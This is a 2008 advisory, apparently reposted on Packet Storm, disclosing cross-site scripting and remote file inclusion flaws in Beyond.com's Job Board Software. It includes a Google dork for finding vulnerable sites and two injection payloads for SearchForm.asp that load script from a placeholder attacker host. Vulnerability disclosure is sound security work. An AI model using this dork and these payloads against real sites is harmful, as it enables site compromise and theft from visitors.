All versions of Job Board Software suffer from cross site scripting and remote file inclusion vulnerabilities.
e9d937160ca2c81632180a9343f722ff0b35350cbcb6b999730f34a454f01fb5+=============================================================================+
+ Job Board Software ALL Versions XSS & RFI Multiple Remote Vulnerabilities +
+=============================================================================+
Author(s): Ivan Sanchez & Maximiliano Soler.
Product: Job Board Software.
Web: https://www.beyond.com/
Versions: ALL Versions Copyright 2001-2008 Beyond.com.
Date: 11/02/2008
GOOGLE DORKS:
------------
[+] inurl:"/JS/Form/SearchForm.asp"
EXPLOIT:
--------
https://www.[DOMAIN].tld/JS/Form/SearchForm.asp
Name External Variable= Keyword Type
Name Internal Variable= FKeywords
[1]- Example form:
Keyword Type = "><script src=https://DOMAIN/scripts/exploit-code.js></script>
[2]- Tampering Attack:
FKeywords="><script src=https://DOMAIN/exploit.js></script>
[3]- More XSS / RFI founded in this application .
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
+=============================================================================+
+ Job Board Software ALL Versions XSS & RFI Multiple Remote Vulnerabilities +
+=============================================================================+
--
Maximiliano Soler.
Reports & Review Code.
Null Code Services.
www.nullcode.com.ar
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed